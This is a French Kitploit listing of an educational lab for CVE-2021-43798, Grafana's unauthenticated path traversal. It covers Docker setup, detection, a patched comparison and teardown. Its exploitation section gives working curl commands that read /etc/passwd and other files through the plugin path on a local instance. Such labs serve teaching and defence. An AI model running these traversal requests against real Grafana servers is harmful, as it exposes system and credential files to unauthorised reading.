Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana Traversée de chemin non authentifiée - Security Lab | Shivam Gupta | 23104003 | Kitploit
Outils/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Traversée de chemin non authentifiée - Security Lab | Shivam Gupta | 23104003

Voir le dépôt
il y a 1 jourPas encore vérifié

CVE-2021-43798 — Laboratoire de traversée de chemin non authentifiée Grafana

Usage éducatif uniquement. Exécutez ce laboratoire uniquement sur une machine locale isolée. Ne l'exposez jamais à Internet.


Résumé de la CVE

ChampDétail
ID CVECVE-2021-43798
ProduitGrafana
Versions affectées8.0.0 – 8.3.0
Version corrigée8.3.1+
SévéritéÉlevée
Score CVSS v3.17.5
CWECWE-22 — Traversée de chemin
Authentification requiseAucune
Vecteur d'attaqueRéseau

Prérequis

  • Docker Desktop (en cours d'exécution)
  • Git
  • curl

Installation

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Démarrer l'environnement vulnérable

root@kitploit:~
docker compose up -d

Vérifier :

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Attendu : "version": "8.3.0"

Ouvrez http://127.0.0.1:3000 — identifiants : admin / admin


Exploiter la vulnérabilité

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Attendu : contenu du fichier renvoyé avec HTTP 200 — aucune authentification requise.


Détection

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Si le hostname est renvoyé → VULNÉRABLE. Version 8.0.0–8.3.0 → VULNÉRABLE.


Remédiation

Démarrer l'instance corrigée (Grafana 8.3.1) :

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Vérifier que l'exploit est bloqué :

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Attendu : {"message": "Plugin file not found"}

Arrêter le laboratoire

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Télécharger l’outil